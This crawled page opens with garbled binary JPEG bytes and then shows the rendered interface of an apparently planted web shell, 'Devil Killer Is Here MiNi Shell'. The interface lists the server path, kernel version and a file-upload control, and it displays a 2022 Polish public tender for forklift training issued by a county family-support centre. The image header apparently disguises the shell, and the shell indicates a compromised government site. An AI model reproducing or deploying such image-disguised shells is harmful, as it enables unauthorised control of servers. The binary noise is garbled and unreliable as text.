JFIF ( %!1!%)+...383-7(-.+  -% &5/------------------------------------------------";!1AQ"aq2#3BRrb*!1"AQa2q#B ?yRd&vGlJwZvK)YrxB#j]ZAT^dpt{[wkWSԋ*QayBbm*&0<|0pfŷM`̬ ^.qR𽬷^EYTFíw<-.j)M-/s yqT'&FKz-([lև<G$wm2*e Z(Y-FVen櫧lҠDwүH4FX1 VsIOqSBۡNzJKzJξcX%vZcFSuMٖ%B ִ##\[%yYꉅ !VĂ1َRI-NsZJLTAPמQ:y״g_g= m֯Ye+Hyje!EcݸࢮSo{׬*h g<@KI$W+W'_> lUs1,o*ʺE.U"N&CTu7_0VyH,q ,)H㲣5<t ;rhnz%ݓz+4 i۸)P6+F>0Tв`&i}Shn?ik܀՟ȧ@mUSLFηh_er i_qt]MYhq 9LaJpPןߘvꀡ\"z[VƬ¤*aZMo=WkpSp \QhMb˒YH=ܒ m`CJt 8oFp]>pP1F>n8(*aڈ.Y݉[iTع JM!x]ԶaJSWҼܩ`yQ`*kE#nNkZKwA_7~ ΁JЍ;-2qRxYk=Uր>Z qThv@.w c{#&@#l;D$kGGvz/7[P+i3nIl`nrbmQi%}rAVPT*SF`{'6RX46PԮp(3W҅U\a*77lq^rT$vs2MU %*ŧ+\uQXVH !4t*Hg"Z챮 JX+RVU+ތ]PiJT XI= iPO=Ia3[ uؙ&2Z@.*SZ (")s8Y/-Fh Oc=@HRlPYp!wr?-dugNLpB1yWHyoP\ѕрiHִ,ِ0aUL.Yy`LSۜ,HZz!JQiVMb{( tژ <)^Qi_`: }8ٱ9_.)a[kSr> ;wWU#M^#ivT܎liH1Qm`cU+!2ɒIX%ֳNړ;ZI$?b$(9f2ZKe㼭qU8I[ U)9!mh1^N0 f_;׆2HFF'4b! yBGH_jтp'?uibQ T#ѬSX5gޒSF64ScjwU`xI]sAM( 5ATH_+s 0^IB++h@_Yjsp0{U@G -:*} TނMH*֔2Q:o@ w5(߰ua+a ~w[3W(дPYrF1E)3XTmIFqT~z*Is*清Wɴa0Qj%{T.ޅ״cz6u6݁h;֦ 8d97ݴ+ޕxзsȁ&LIJT)R0}f }PJdp`_p)əg(ŕtZ 'ϸqU74iZ{=Mhd$L|*UUn &ͶpHYJۋj /@9X?NlܾHYxnuXږAƞ8j ໲݀pQ4;*3iMlZ6w ȵP Shr!ݔDT7/ҡϲigD>jKAX3jv+ ߧز #_=zTm¦>}Tց<|ag{E*ֳ%5zW.Hh~a%j"e4i=vױi8RzM75i֟fEu64\էeo00d H韧rȪz2eulH$tQ>eO$@B /?=#٤ǕPS/·.iP28s4vOuz3zT& >Z2[0+[#Fޑ]!((!>s`rje('|,),y@\pЖE??u˹yWV%8mJ iw:u=-2dTSuGL+m<*צ1as&5su\phƃ qYLֳ>Y(PKi;Uڕp ..!i,54$IUEGLXrUE6m UJC?%4AT]I]F>׹P9+ee"Aid!Wk|tDv/ODc/,o]i"HIHQ_n spv"b}}&I:pȟU-_)Ux$l:fژɕ(I,oxin8*G>ÌKG}Rڀ8Frajٷh !*za]lx%EVRGYZoWѮ昀BXr{[d,t Eq ]lj+ N})0B,e iqT{z+O B2eB89Cڃ9YkZySi@/(W)d^Ufji0cH!hm-wB7C۔֛X$Zo)EF3VZqm)!wUxM49< 3Y .qDfzm |&T"} {*ih&266U9* <_# 7Meiu^h--ZtLSb)DVZH*#5UiVP+aSRIª!p挤c5g#zt@ypH={ {#0d N)qWT kA<Ÿ)/RT8D14y b2^OW,&Bcc[iViVdִCJ'hRh( 1K4#V`pِTw<1{)XPr9Rc 4)Srgto\Yτ~ xd"jO:A!7􋈒+E0%{M'T^`r=E*L7Q]A{]A<5ˋ.}<9_K (QL9FЍsĮC9!rpi T0q!H \@ܩB>F6 4ۺ6΋04ϲ^#>/@tyB]*ĸp6&<џDP9ᗟatM'> b쪗wI!܁V^tN!6=FD܆9*? q6h8  {%WoHoN.l^}"1+uJ ;r& / IɓKH*ǹP-J3+9 25w5IdcWg0n}U@2 #0iv腳z/^ƃOR}IvV2j(tB1){S"B\ ih.IXbƶ:GnI F.^a?>~!k''T[ע93fHlNDH;;sg-@, JOs~Ss^H '"#t=^@'W~Ap'oTڭ{Fن̴1#'c>꜡?F颅B L,2~ת-s2`aHQm:F^j&~*Nūv+{sk$F~ؒ'#kNsٗ D9PqhhkctԷFIo4M=SgIu`F=#}Zi'cu!}+CZI7NuŤIe1XT xC۷hcc7 l?ziY䠩7:E>k0Vxypm?kKNGCΒœap{=i1<6=IOV#WY=SXCޢfxl4[Qe1 hX+^I< tzǟ;jA%n=q@j'JT|na$~BU9؂dzu)m%glwnXL`޹W`AH̸뢙gEu[,'%1pf?tJ Ζmc[\ZyJvn$Hl'<+5[b]v efsЁ ^. &2 yO/8+$ x+zs˧Cޘ'^e fA+ڭsOnĜz,FU%HU&h fGRN擥{N$k}92k`Gn8<ʮsdH01>b{ {+ [k_F@KpkqV~sdy%ϦwK`D!N}N#)x9nw@7y4*\ Η$sR\xts30`O<0m~%U˓5_m ôªs::kB֫.tpv쌷\R)3Vq>ٝj'r-(du @9s5`;iaqoErY${i .Z(Џs^!yCϾ˓JoKbQU{௫e.-r|XWլYkZe0AGluIɦvd7 q -jEfۭt4q +]td_+%A"zM2xlqnVdfU^QaDI?+Vi\ϙLG9r>Y {eHUqp )=sYkt,s1!r,l鄛u#I$-֐2A=A\J]&gXƛ<ns_Q(8˗#)4qY~$'3"'UYcIv s.KO!{, ($LI rDuL_߰ Ci't{2L;\ߵ7@HK.Z)4
Devil Killer Is Here MiNi Shell

MiNi SheLL

Current Path : /home/vmanager/www/common/web/tenders/20220607/

Linux 9dbcd5f6333d 5.15.0-124-generic #134-Ubuntu SMP Fri Sep 27 20:20:17 UTC 2024 x86_64
Upload File :
Current File : /home/vmanager/www/common/web/tenders/20220607/0019836201-N-2022.html

<!-- Version 1.0.0 --><style type="text/css"> .normal { color: black; } h1.title { }</style> <h1 class="text-center mt-5 mb-5">Ogłoszenie o zamówieniu<br/> Usługi<br/> organizacja i przeprowadzenie usług szkoleniowych dla uczestników/uczestniczek projektu ,,Postaw na siebie” współfinansowanego ze środków Europejskiego Funduszu Społecznego </h1> <h2 class="bg-light p-3 mt-4">SEKCJA I - ZAMAWIAJĄCY</h2> <h3 class="mb-0">1.1.) Rola zamawiającego</h3> <p class="mb-0">Postępowanie prowadzone jest samodzielnie przez zamawiającego</p> <h3 class="mb-0">1.2.) Nazwa zamawiającego: <span class="normal">Powiatowe Centrum Pomocy Rodzinie</span></h3> <h3 class="mb-0">1.4) Krajowy Numer Identyfikacyjny: <span class="normal">REGON 711586975</span></h3><h3 class="mb-0">1.5) Adres zamawiającego </h3> <h3 class="mb-0">1.5.1.) Ulica: <span class="normal">Konstytucji 3 Maja 16</span></h3> <h3 class="mb-0">1.5.2.) Miejscowość: <span class="normal">Mińsk Mazowiecki</span></h3> <h3 class="mb-0">1.5.3.) Kod pocztowy: <span class="normal">05-300</span></h3> <h3 class="mb-0">1.5.4.) Województwo: <span class="normal">mazowieckie</span></h3> <h3 class="mb-0">1.5.5.) Kraj: <span class="normal">Polska</span></h3> <h3 class="mb-0">1.5.6.) Lokalizacja NUTS 3: <span class="normal">PL912 - Warszawski wschodni</span></h3> <h3 class="mb-0">1.5.9.) Adres poczty elektronicznej: <span class="normal">sekretariat@pcpr-minskmaz.pl</span></h3> <h3 class="mb-0">1.5.10.) Adres strony internetowej zamawiającego: <span class="normal">www.pcpr-minskmaz.pl</span></h3> <h3 class="mb-0"> 1.6.) Rodzaj zamawiającego: <span class="normal">Zamawiający publiczny - jednostka sektora finansów publicznych - jednostka samorządu terytorialnego</span> </h3> <h3 class="mb-0"> 1.7.) Przedmiot działalności zamawiającego: <span class="normal">Ochrona socjalna</span> </h3> <h2 class="bg-light p-3 mt-4">SEKCJA II – INFORMACJE PODSTAWOWE</h2> <h3 class="mb-0">2.1.) Ogłoszenie dotyczy: </h3> <p class="mb-0"> Zamówienia publicznego </p> <h3 class="mb-0">2.2.) Ogłoszenie dotyczy usług społecznych i innych szczególnych usług: <span class="normal">Nie</span></h3> <h3 class="mb-0">2.3.) Nazwa zamówienia albo umowy ramowej: </h3> <p class="mb-0"> organizacja i przeprowadzenie usług szkoleniowych dla uczestników/uczestniczek projektu ,,Postaw na siebie” współfinansowanego ze środków Europejskiego Funduszu Społecznego </p> <h3 class="mb-0">2.4.) Identyfikator postępowania: <span class="normal">ocds-148610-e1f9e20d-e64e-11ec-9a86-f6f4c648a056</span></h3> <h3 class="mb-0">2.5.) Numer ogłoszenia: <span class="normal">2022/BZP 00198362</span></h3> <h3 class="mb-0">2.6.) Wersja ogłoszenia: <span class="normal">01</span></h3> <h3 class="mb-0">2.7.) Data ogłoszenia: <span class="normal">2022-06-07</span></h3> <h3 class="mb-0">2.8.) Zamówienie albo umowa ramowa zostały ujęte w planie postępowań: <span class="normal">Tak</span></h3> <h3 class="mb-0">2.9.) Numer planu postępowań w BZP: <span class="normal">2022/BZP 00121150/01/P</span></h3> <h3 class="mb-0">2.10.) Identyfikator pozycji planu postępowań: </h3> <p class="mb-0">1.3.1 organizacja i przeprowadzenie usług szkoleniowych</p> <h3 class="mb-0">2.11.) O udzielenie zamówienia mogą ubiegać się wyłącznie wykonawcy, o których mowa w art. 94 ustawy: <span class="normal">Nie</span></h3> <h3 class="mb-0">2.14.) Czy zamówienie albo umowa ramowa dotyczy projektu lub programu współfinansowanego ze środków Unii Europejskiej: <span class="normal">Nie</span></h3> <h3 class="mb-0">2.16.) Tryb udzielenia zamówienia wraz z podstawą prawną</h3> <p class="mb-0"> Zamówienie udzielane jest w trybie podstawowym na podstawie: art. 275 pkt 1 ustawy </p> <h2 class="bg-light p-3 mt-4">SEKCJA III – UDOSTĘPNIANIE DOKUMENTÓW ZAMÓWIENIA I KOMUNIKACJA</h2> <h3 class="mb-0">3.1.) Adres strony internetowej prowadzonego postępowania</h3> https://pcprmm.bip.gov.pl/ <h3 class="mb-0">3.2.) Zamawiający zastrzega dostęp do dokumentów zamówienia: <span class="normal">Nie</span></h3> <h3 class="mb-0">3.4.) Wykonawcy zobowiązani są do składania ofert, wniosków o dopuszczenie do udziału w postępowaniu, oświadczeń oraz innych dokumentów wyłącznie przy użyciu środków komunikacji elektronicznej: <span class="normal">Tak</span></h3> <h3 class="mb-0">3.5.) Informacje o środkach komunikacji elektronicznej, przy użyciu których zamawiający będzie komunikował się z wykonawcami - adres strony internetowej: <span class="normal">j: W postępowaniu o udzielenie zamówienia komunikacja między Zamawiającym a<br/>Wykonawcami odbywa się drogą elektroniczną przy użyciu miniPortalu: https://miniportal.uzp.gov.pl, ePUAPu: https://epuap.gov.pl<br/>oraz poczty elektronicznej: sekretariat@pcpr-minskmaz.pl</span></h3> <h3 class="mb-0">3.6.) Wymagania techniczne i organizacyjne dotyczące korespondencji elektronicznej: <span class="normal">1.Wiadomości przekazywane drogą<br/>elektroniczną powinny w sposób jednoznaczny wskazywać nr<br/>postępowania oraz dane identyfikujące Wykonawcę.2. W postępowaniu o udzielenie zamówienia<br/>komunikacja między Zamawiającym a Wykonawcami odbywa się drogą elektroniczną przy użyciu<br/>miniPortalu: https://miniportal.uzp.gov.pl, ePUAPu: https://epuap.gov.pl oraz poczty elektronicznej:<br/>sekretariat@pcpr-minskmaz.pl 3. Wykonawca zamierzający wziąć udział w postępowaniu o udzielenie<br/>zamówienia publicznego, musi posiadać konto na ePUAP. Wykonawca posiadający konto na ePUAP<br/>ma dostęp do następujących formularzy: „Formularz do złożenia, zmiany i wycofania oferty lub<br/>wniosku” oraz „Formularz do komunikacji”. Wykonawca winien zaszyfrować ofertę i przesłać do<br/>Zamawiającego zgodnie z regulaminem korzystania z systemu miniPortalu oraz Warunkach<br/>korzystania z elektronicznej platformy usług administracji publicznej (ePUAP).4. Wymagania<br/>techniczne i organizacyjne wysyłania i odbierania dokumentów elektronicznych, cyfrowych<br/>odwzorowań dokumentów i oświadczeń oraz informacji przekazywanych przy ich użyciu zostały<br/>opisane w Regulaminie korzystania z systemu miniPortalu oraz Warunkach korzystania z<br/>elektronicznej platformy usług administracji publicznej (ePUAP).5. Wykonawca przystępując do<br/>niniejszego postępowania o udzielenie zamówienia publicznego, akceptuje warunki korzystania z<br/>miniPortalu, określone w Regulaminie miniPortalu oraz zobowiązuje się korzystając z miniPortalu<br/>przestrzegać postanowień tego regulaminu.6. Maksymalny rozmiar plików przesyłanych za pośrednictwem dedykowanych<br/>formularzy: „Formularz złożenia, zmiany, wycofania oferty lub wniosku”<br/>oraz „Formularz do komunikacji” wynosi 150 MB.7. Za datę przekazania oferty, wniosków,<br/>zawiadomień, dokumentów elektronicznych, oświadczeń lub cyfrowych odwzorowań dokumentów oraz<br/>innych informacji przyjmuje się datę ich przekazania na ePUAP. W przypadku przekazywania tych<br/>dokumentów (innych niż oferta oraz załączniki do oferty) oraz informacji za pomocą poczty<br/>elektronicznej - datą ich przesłania będzie potwierdzenie dostarczenia wiadomości zawierającej<br/>dokument/informację z serwera pocztowego Zamawiającego.8. Zamawiający przekazuje identyfikator<br/>postępowania jako załącznik do niniejszej SWZ. Dane postępowanie można wyszukać również na<br/>Liście wszystkich postępowań klikając wcześniej opcję „Dla Wykonawców&#34; lub ze strony głównej z<br/>zakładki Postępowania na miniPortalu.9. W postępowaniu o udzielenie zamówienia komunikacja<br/>pomiędzy Zamawiającym a Wykonawcami w szczególności składanie dokumentów elektronicznych<br/>(innych niż oferta oraz załączniki do oferty), cyfrowych odwzorowań dokumentów oraz przekazywanie<br/>informacji odbywa się elektronicznie za pośrednictwem dedykowanego formularza dostępnego na<br/>ePUAP oraz udostępnionego przez miniPortal (Formularz do komunikacji). Zamawiający może również<br/>komunikować się z Wykonawcami za pomocą poczty elektronicznej, email: sekretariat@pcpr-<br/>minskmaz.pl. 10. Sposób sporządzenia dokumentów elektronicznych, cyfrowych odwzorowań<br/>dokumentów oraz informacji musi być zgody z wymaganiami określonymi w rozporządzeniu Prezesa<br/>Rady Ministrów z dnia z dnia 30 grudnia 2020 r. w sprawie sposobu sporządzania i przekazywania<br/>informacji oraz wymagań technicznych dla dokumentów elektronicznych oraz środków komunikacji<br/>elektronicznej w postępowaniu o udzielenie zamówienia publicznego lub konkursie (Dz. U. z 2020 r.,<br/>poz. 2452).11. Zamawiający nie przewiduje sposobu komunikowania się z Wykonawcami w inny<br/>sposób niż przy użyciu środków komunikacji elektronicznej, wskazanych w SWZ. 12. Ofertę, a także<br/>oświadczenia składa się, pod rygorem nieważności, w formie elektronicznej opatrzonej podpisem kwalifikowanym, zaufanym lub<br/>podpisem osobistym</span></h3> <h3 class="mb-0">3.8.) Zamawiający wymaga sporządzenia i przedstawienia ofert przy użyciu narzędzi elektronicznego modelowania danych budowlanych lub innych podobnych narzędzi, które nie są ogólnie dostępne: <span class="normal">Nie</span></h3> <h3 class="mb-0">3.12.) Oferta - katalog elektroniczny: <span class="normal">Nie dotyczy</span></h3> <h3 class="mb-0">3.14.) Języki, w jakich mogą być sporządzane dokumenty składane w postępowaniu: </h3> <p class="mb-0">polski</p> <h3 class="mb-0">3.15.) RODO (obowiązek informacyjny): <span class="normal">1. Zgodnie z art. 13 ust. 1 i 2 rozporządzenia Parlamentu Europejskiego i Rady (UE)<br/>2016/679 z dnia 27 kwietnia 2016 r. w sprawie ochrony osób fizycznych w związku z przetwarzaniem danych osobowych i w sprawie<br/>swobodnego przepływu takich danych oraz uchylenia dyrektywy 95/46/WE (ogólne rozporządzenie o ochronie danych) (Dz. Urz. UE<br/>L 119 z 04.05.2016 r., str. 1), zwanego dalej RODO, informuję, że:<br/>l) Administratorem danych osobowych przetwarzanych w związku z prowadzonym postępowaniem o udzielenie zamówienia<br/>publicznego jest Powiatowe Centrum Pomocy Rodzinie w Mińsku Mazowieckim, ul. Konstytucji 3 Maja 16, 05-300 Mińsk Mazowiecki<br/>2) Dane kontaktowe Inspektora Ochrony Danych Osobowych są następujące: inspektor@pcpr-minskmaz.pl<br/>3) Dane osobowe przetwarzane będą na podstawie art. 6 ust. I lit. b i c RODO, w celu związanym<br/>z postępowaniem o udzielenie zamówienia publicznego polegającego na organizacji<br/>i przeprowadzeniu szkolenia w ramach projektu „Postaw na siebie” współfinansowanego ze środków Europejskiego Funduszu<br/>Społecznego” oraz w celu zawarcia umowy,<br/>4) Odbiorcami danych osobowych będą osoby lub podmioty, którym udostępniona zostanie dokumentacja postępowania w oparciu o<br/>przepisy:<br/>ustawy z dnia 6 września 2001 r. o dostępnie do informacji publicznej (Dz. U. z 2022 r. poz. 902 z późn. zm.), ustawy z dnia 27<br/>sierpnia 2009 r. o finansach publicznych (Dz. U. z 2021 r. poz. 305 z późn. zm.), właściwe dla instytucji kontrolnych wobec<br/>Zamawiającego.<br/>5) Dane osobowe będą przechowywane przez czas trwania umowy, a następnie przez okres przechowywania dokumentacji<br/>postępowania lub umowy zgodnie z właściwą kategorią archiwalną.<br/>6) Podanie danych osobowych jest niezbędne do prawidłowego przeprowadzenia postępowania o udzielenie zamówienia<br/>publicznego, zawarcia umów i ich dalszej realizacji. Niepodanie danych osobowych spowoduje, że nie będzie możliwe uwzględnienie<br/>złożonej oferty i zawarcie umów.<br/>7) W odniesieniu do danych osobowych decyzje nie będą podejmowane w sposób zautomatyzowany, stosownie do art. 22 RODO.<br/>8) Osobie, której dane dotyczą przysługuje:<br/>- na podstawie art, 15 RODO prawo dostępu do swoich danych osobowych,<br/>- na podstawie art. 16 RODO prawo do sprostowania swoich danych osobowych,<br/>- na podstawie art. 18 RODO prawo żądania od administratora ograniczenia przetwarzania danych osobowych z zastrzeżeniem<br/>przypadków, o których mowa w art. 18 ust. 2 RODO,<br/>- prawo do wniesienia skargi do Prezesa Urzędu Ochrony Danych Osobowych, gdy uzna, że przetwarzanie danych osobowych<br/>narusza przepisy RODO.<br/>9) Nie przysługuje osobie, której dane dotyczą:<br/>- w związku z art. 17 ust. 3 lit. b, d lub e RODO prawo do usunięcia danych osobowych,<br/>- prawo do przenoszenia danych osobowych, o którym mowa w art. 20 RODO,<br/>- na podstawie art. 21 RODO prawo sprzeciwu, wobec przetwarzania danych osobowych, gdyż podstawą prawną przetwarzania<br/>danych osobowych jest art. 6 ust. 1 lit. c RODO.<br/>10. Dane osobowe na podstawie przepisów prawa mogą zostać udostępnione Instytucji Zarządzającej Regionalnym Programem<br/>Operacyjnym Województwa Mazowieckiego ( Zarządowi Województwa Mazowieckiego),nadzorującej postępowanie o udzielenie<br/>zamówienia publicznego polegającego na organizacji i przeprowadzeniu szkoleń w ramach projektu „Postaw na siebie”<br/>współfinansowanego ze środków Europejskiego Funduszu Społecznego</span></h3> <h2 class="bg-light p-3 mt-4">SEKCJA IV – PRZEDMIOT ZAMÓWIENIA</h2><h3 class="mb-0">4.1.) Informacje ogólne odnoszące się do przedmiotu zamówienia.</h3> <h3 class="mb-0">4.1.1.) Przed wszczęciem postępowania przeprowadzono konsultacje rynkowe: <span class="normal">Nie</span></h3> <h3 class="mb-0">4.1.2.) Numer referencyjny: <span class="normal">EFS.252.4.2022</span></h3> <h3 class="mb-0">4.1.3.) Rodzaj zamówienia: <span class="normal">Usługi</span></h3> <h3 class="mb-0">4.1.4.) Zamawiający udziela zamówienia w częściach, z których każda stanowi przedmiot odrębnego postępowania: <span class="normal">Nie</span></h3> <h3 class="mb-0">4.1.8.) Możliwe jest składanie ofert częściowych: <span class="normal">Nie</span></h3> <h3 class="mb-0">4.1.13.) Zamawiający uwzględnia aspekty społeczne, środowiskowe lub etykiety w opisie przedmiotu zamówienia: <span class="normal">Nie</span></h3><h3 class="mb-0">4.2. Informacje szczegółowe odnoszące się do przedmiotu zamówienia:</h3> <h3 class="mb-0">4.2.2.) Krótki opis przedmiotu zamówienia</h3> <p class="mb-0"> Kurs na wózki jezdniowe podnośnikowe z mechanicznym napędem podnoszenia z wysięgnikiem oraz wózki<br/>jezdniowe podnośnikowe z mechanicznym napędem podnoszenia z osobą obsługującą podnoszoną wraz z ładunkiem i<br/>egzaminem UDT dla 2 osób nie posiadających doświadczenia zawodowego. Kurs powinien być przeprowadzony w systemie<br/>dziennym. Zamawiający zastrzega sobie możliwość zmiany systemu w zależności od aktualnych potrzeb<br/>uczestników/uczestniczek projektu (po uzgodnieniu z Wykonawcą). Wykonawca ponosi koszty egzaminu zewnętrznego<br/>(UDT). </p> <h3 class="mb-0">4.2.6.) Główny kod CPV: <span class="normal">80500000-9 - Usługi szkoleniowe</span></h3> <h3 class="mb-0">4.2.8.) Zamówienie obejmuje opcje: <span class="normal">Nie</span></h3> <!-- realizacja do --> <h3 class="mb-0">4.2.10.) Okres realizacji zamówienia albo umowy ramowej: <span class="normal">do 2022-08-31</span></h3> <h3 class="mb-0">4.2.11.) Zamawiający przewiduje wznowienia: <span class="normal">Nie</span></h3> <h3 class="mb-0">4.2.13.) Zamawiający przewiduje udzielenie dotychczasowemu wykonawcy zamówień na podobne usługi lub roboty budowlane: <span class="normal">Nie</span></h3> <h3 class="mb-0">4.3.) Kryteria oceny ofert</h3> <h3 class="mb-0">4.3.1.) Sposób oceny ofert: <span class="normal">Przy wyborze oferty zamawiający kierować się będzie następującymi<br/>kryteriami: Cena -60 pkt oraz Doświadczenie osób wyznaczonych do realizacji zamówienia -40 pkt. W<br/>przypadku, gdy do postępowania złożona zostanie tylko jedna oferta niepodlegająca odrzuceniu,<br/>otrzyma ona maksymalną liczbę punktów, równą 100 pkt.W przypadku, gdy do postępowania złożone<br/>zostaną co najmniej dwie oferty niepodlegające odrzuceniu, punkty przyznane danej ofercie zostaną<br/>obliczone wg poniższego wzoru: OLP = C + D gdzie:C – ilość punktów uzyskanych w kryterium<br/>„cena”.D – ilość punktów uzyskanych w kryterium „doświadczenie osób wyznaczonych do realizacji<br/>zamówienia”.c. Zasady przydzielania punktów za poszczególne kryteria są następujące:A. Kryterium:<br/>Cena - C. Punkty za cenę oblicza się przyjmując za podstawę najniższą cenę ofertową, przyznając jej<br/>maksymalną ilość punktów, tj. 60 pkt.Punkty dla pozostałych ofert oblicza się według wzoru:cena<br/>najniższa/cena badanej oferty x 60 pkt = C (ilość punktów dla danej oferty) B. Kryterium:<br/>Doświadczenie osób wyznaczonych do realizacji zamówienia- D. Maksymalna liczba punktów do<br/>uzyskania przez Wykonawcę w kryterium doświadczenie wynosi 40. Przez doświadczenie osób<br/>wyznaczonych do realizacji zamówienia rozumie się należyte wykonanie usług mających za przedmiot<br/>usługi szkoleniowej o tematyce zgodnej z programem szkolenia wyrażone liczbą wykonanych szkoleń<br/>potwierdzonych dowodami określającymi czy te usługi zostały wykonane należycie, przy czym<br/>dowodami są referencje/poświadczenia sporządzone przez podmiot na rzecz którego usługa została<br/>wykonana (pod uwagę brane będą szkolenia wykonane w okresie ostatnich 3 lat przed upływem<br/>terminu składania ofert, a jeżeli okres prowadzenia działalności jest krótszy to w tym okresie).Za każde<br/>przeprowadzone szkolenie o tematyce zgodnej z programem szkolenia, potwierdzone<br/>referencjami/poświadczeniami należytego wykonania przez podmiot na rzecz którego usługa została<br/>wykonana Zamawiający przyzna 1 punkt, jednak nie więcej niż 40 punktów za przeprowadzenie 40 lub<br/>więcej szkoleń.Punkty przyznane osobom wyznaczonym do realizacji zamówienia zostaną zsumowane<br/>i podzielone przez liczbę osób wskazanych do realizacji szkolenia.Obliczenie liczby uzyskanych<br/>punktów nastąpi według wzoru:suma pkt uzyskanych przez kadrę wskazaną w ofercie/liczba<br/>ocenianych osób wyznaczonych do realizacji zamówienia = ilość punktów dla danej oferty.W celu<br/>udokumentowania posiadanego doświadczenia zawodowego osób wyznaczonych do realizacji<br/>zamówienia Wykonawca dołącza do oferty:1) wykaz osób wyznaczonych do realizacji zamówienia<br/>zawierający w szczególności:a) imię i nazwisko,b) informację o zrealizowanych przez osobę<br/>szkoleniach o tematyce zgodnej z programem szkolenia, c) termin realizacji szkolenia, d) nazwę<br/>zleceniodawcy/pracodawcy. 2) dowody określające czy te szkolenia zostały wykonane należycie, przy<br/>czym dowodami, o których mowa są referencje/poświadczenia sporządzone przez podmiot na rzecz<br/>którego usługa została wykonana.Jeżeli z treści dowodów nie wynika bezpośrednio imię i nazwisko<br/>osoby wyznaczonej do realizacji zamówienia dodatkowo należy dołączyć dokument potwierdzający<br/>przeprowadzenie szkolenia przez osobę wskazaną w ofercie. Zamawiający w tym kryterium przyzna<br/>punkty tylko za przeprowadzone szkolenia potwierdzone dowodami określającymi czy te usługi zostały<br/>wykonane należycie, przy czym dowodami są referencje/poświadczenia sporządzone przez podmiot na<br/>rzecz którego usługa została wykonana</span></h3> <h3 class="mb-0">4.3.2.) Sposób określania wagi kryteriów oceny ofert: <span class="normal"> Punktowo </span></h3> <h3 class="mb-0">4.3.3.) Stosowane kryteria oceny ofert: <span class="normal"> Kryterium ceny oraz kryteria jakościowe </span></h3> <h3 class="mb-0">Kryterium 1</h3> <h3 class="mb-0">4.3.5.) Nazwa kryterium: <span class="normal">Cena</span></h3> <h3 class="mb-0">4.3.6.) Waga: <span class="normal">60</span></h3> <h3 class="mb-0">Kryterium 2</h3> <h3 class="mb-0">4.3.4.) Rodzaj kryterium: </h3> organizacja, kwalifikacje zawodowe i doświadczenie osób wyznaczonych do realizacji zamówienia <h3 class="mb-0">4.3.5.) Nazwa kryterium: <span class="normal">Doświadczenie osób wyznaczonych do realizacji zamówienia</span></h3> <h3 class="mb-0">4.3.6.) Waga: <span class="normal">40</span></h3> <h3 class="mb-0">4.3.10.) Zamawiający określa aspekty społeczne, środowiskowe lub innowacyjne, żąda etykiet lub stosuje rachunek kosztów cyklu życia w odniesieniu do kryterium oceny ofert: <span class="normal">Nie</span></h3> <h2 class="bg-light p-3 mt-4">SEKCJA V - KWALIFIKACJA WYKONAWCÓW</h2> <h3 class="mb-0">5.1.) Zamawiający przewiduje fakultatywne podstawy wykluczenia: <span class="normal">Tak</span></h3> <h3 class="mb-0">5.2.) Fakultatywne podstawy wykluczenia: </h3> <p class="mb-0">Art. 109 ust. 1 pkt 4</p> <p class="mb-0">Art. 109 ust. 1 pkt 5</p> <p class="mb-0">Art. 109 ust. 1 pkt 7</p> <h3 class="mb-0">5.3.) Warunki udziału w postępowaniu: <span class="normal">Tak</span></h3> <h3 class="mb-0">5.4.) Nazwa i opis warunków udziału w postępowaniu.</h3> O udzielenie zamówienia mogą ubiegać się wykonawcy, którzy spełniają następujące warunki udziału w postępowaniu:<br/>1. Zdolności do występowania w obrocie gospodarczym<br/>Zamawiający nie stawia warunków w powyższym zakresie.<br/>2. Uprawnienia do prowadzenia określonej działalności gospodarczej lub zawodowej,<br/>o ile wynika to z odrębnych przepisów:<br/>Dla uznania, że wykonawca spełnia warunek posiadania uprawnień do organizowania i prowadzenia szkoleń objętych<br/>niniejszym zamówieniem, Zamawiający wymaga, aby wykonawca przedłożył:<br/>• Posiadają wpis do rejestru instytucji szkoleniowych prowadzony przez wojewódzki urząd pracy właściwy ze względu na<br/>siedzibę instytucji szkoleniowej ,<br/>3. sytuacja ekonomiczna lub finansowa<br/>Zamawiający nie stawia warunków w powyższym zakresie 4. zdolności techniczne lub zawodowe<br/>Dysponują w dacie wykonania zamówienia w miejscu jego wykonywania co najmniej 1 osobą posiadającą minimum 2 letnie<br/>doświadczenie w prowadzeniu szkoleń o tematyce niniejszego szkolenia. Celem wykazania spełnienia warunku Wykonawca<br/>przedłoży oświadczenie zgodne z załącznikiem nr 4 do ogłoszenia.<br/>5. Zamawiający, w stosunku do Wykonawców wspólnie ubiegających się o udzielenie zamówienia, w odniesieniu do<br/>warunku dotyczącego zdolności technicznej lub zawodowej – dopuszcza łączne spełnianie warunku przez Wykonawców.<br/>6. Zamawiający może na każdym etapie postępowania, uznać, że wykonawca nie posiada wymaganych zdolności, jeżeli<br/>posiadanie przez wykonawcę sprzecznych interesów, w szczególności zaangażowanie zasobów technicznych lub<br/>zawodowych wykonawcy w inne przedsięwzięcia gospodarcze wykonawcy może mieć negatywny wpływ na realizację<br/>zamówienia.<br/>7. Z postępowania o udzielenie zamówienia wyklucza się Wykonawców, w stosunku do których zachodzi którakolwiek z<br/>okoliczności wskazanych:<br/>1) w art. 108 ust. 1 p.z.p.;<br/>2) w art. 109 ust. 1 pkt. 4, 5, 7 p.z.p., tj.:<br/>a) w stosunku do którego otwarto likwidację, ogłoszono upadłość, którego aktywami zarządza likwidator lub sąd, zawarł<br/>układ z wierzycielami, którego działalność gospodarcza jest zawieszona albo znajduje się on w innej tego rodzaju sytuacji<br/>wynikającej z podobnej procedury przewidzianej w przepisach miejsca wszczęcia tej procedury;<br/>b) który w sposób zawiniony poważnie naruszył obowiązki zawodowe, co podważa jego uczciwość, w szczególności gdy<br/>wykonawca w wyniku zamierzonego działania lub rażącego niedbalstwa nie wykonał lub nienależycie wykonał zamówienie,<br/>co zamawiający jest w stanie wykazać za pomocą stosownych dowodów;<br/>c) który z przyczyn leżących po jego stronie, w znacznym stopniu lub zakresie nie wykonał lub nienależycie wykonał albo<br/>długotrwale nienależycie wykonywał istotne zobowiązanie wynikające z wcześniejszej umowy w sprawie zamówienia<br/>publicznego lub umowy koncesji, co doprowadziło do wypowiedzenia lub odstąpienia od umowy, odszkodowania,<br/>wykonania zastępczego lub realizacji uprawnień z tytułu rękojmi za wady;<br/>3) Wykluczenie Wykonawcy następuje zgodnie z art. 111 p.z. <h3 class="mb-0">5.5.) Zamawiający wymaga złożenia oświadczenia, o którym mowa w art.125 ust. 1 ustawy: <span class="normal">Tak</span></h3> <h3 class="mb-0"> 5.6.) Wykaz podmiotowych środków dowodowych na potwierdzenie niepodlegania wykluczeniu: <span class="normal">1) Oświadczenie o braku<br/>podstaw do wykluczenia z postępowania o udzielenie zamówienia - wg<br/>załącznika 3 do SWZ</span> </h3> <h3 